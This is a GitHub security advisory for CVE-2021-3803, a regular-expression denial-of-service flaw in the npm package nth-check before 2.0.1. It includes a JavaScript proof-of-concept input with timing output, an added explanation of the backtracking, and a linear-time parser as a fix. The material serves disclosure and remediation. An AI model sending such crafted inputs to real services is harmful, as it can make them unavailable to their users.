Inefficient Regular Expression Complexity in nth-check

High severity. GitHub Reviewed. Published Sep 20, 2021 to the GitHub Advisory Database. Updated Nov 29, 2023.

Package

npm nth-check (npm)

Affected versions

< 2.0.1

Patched versions

2.0.1

Description

There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.

The ReDoS vulnerability in the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))?, where two adjacent quantified sub-expressions (the leading \s* and the \s* inside the optional group) can match overlapping runs of input, and it can be triggered with the following code.

Proof of Concept

// PoC.js
var nthCheck = require("nth-check");
// Each iteration adds 10,000 more spaces between "2n" and a trailing "!"
// that the pattern cannot match, so the regex backtracks before failing.
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str);
    }
    catch (err) {
        // parse() always throws for this input; report how long it took
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
}

The Output

attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
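The quadratic behaviour above comes from two \s* quantifiers competing for the same run of spaces. As an added example (not nth-check's own code), the following shows the vulnerable pattern next to a hand-written single-pass parser for the same an+b grammar; the full RE_NTH_ELEMENT regex is reconstructed around the sub-pattern the advisory quotes and should be treated as an assumption, as should the helper names.

```javascript
// Added example, not nth-check's own code. RE_NTH_ELEMENT reconstructs the
// pre-2.0.1 pattern around the sub-pattern quoted in the advisory (treat it
// as an assumption); linearParse reads the same grammar in one pass.
//
// The trailing "\s*" and the "\s*" inside the optional group can both claim
// the same run of spaces. When the input ends in a character neither can
// consume ("!" in the PoC), the engine retries every split of that run, so
// rejecting the input costs O(n^2) in the number of spaces.
const RE_NTH_ELEMENT = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;
// Does the vulnerable regex accept this input? Used only to show that the
// linear parser agrees with it on well-formed "an+b" expressions.
function regexAccepts(formula) {
  return RE_NTH_ELEMENT.test(formula.trim().toLowerCase());
}
// Returns [a, b] for "an+b"; throws on anything it cannot consume fully.
function linearParse(formula) {
  formula = formula.trim().toLowerCase();
  if (formula === "even") return [2, 0];
  if (formula === "odd") return [2, 1];
  let i = 0;
  const skipWs = () => { while (i < formula.length && /\s/.test(formula[i])) i++; };
  const readSign = () => {
    if (formula[i] === "+" || formula[i] === "-") return formula[i++] === "-" ? -1 : 1;
    return 1;
  };
  const readNumber = () => {            // null when no digits are present
    const start = i;
    while (i < formula.length && formula[i] >= "0" && formula[i] <= "9") i++;
    return i > start ? parseInt(formula.slice(start, i), 10) : null;
  };
  let a = 0;
  let sign = readSign();
  let num = readNumber();
  if (formula[i] === "n") {             // "an" part; a bare "n" means a = 1
    i++;
    a = sign * (num ?? 1);
    skipWs();
    if (i < formula.length) {           // optional "+ b" / "- b" tail
      sign = readSign();
      skipWs();
      num = readNumber();
    } else {
      sign = 1; num = 0;
    }
  }
  // Leftover input (the "!" in the PoC) is rejected here after a single pass
  // over the whitespace, not a quadratic retry.
  if (num === null || i < formula.length) throw new Error(`n-th rule couldn't be parsed ('${formula}')`);
  return [a, sign * num];
}
```

Feeding the PoC string to linearParse throws immediately regardless of how many spaces it contains, because the whitespace is consumed exactly once before the "!" is seen.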

References

Published by the National Vulnerability Database Sep 17, 2021
Reviewed Sep 20, 2021
Published to the GitHub Advisory Database Sep 20, 2021
Last updated Nov 29, 2023

Severity

High 7.5 / 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS score

0.267% (68th percentile)

CVE ID

CVE-2021-3803

GHSA ID

GHSA-rp65-9cf3-cjxr
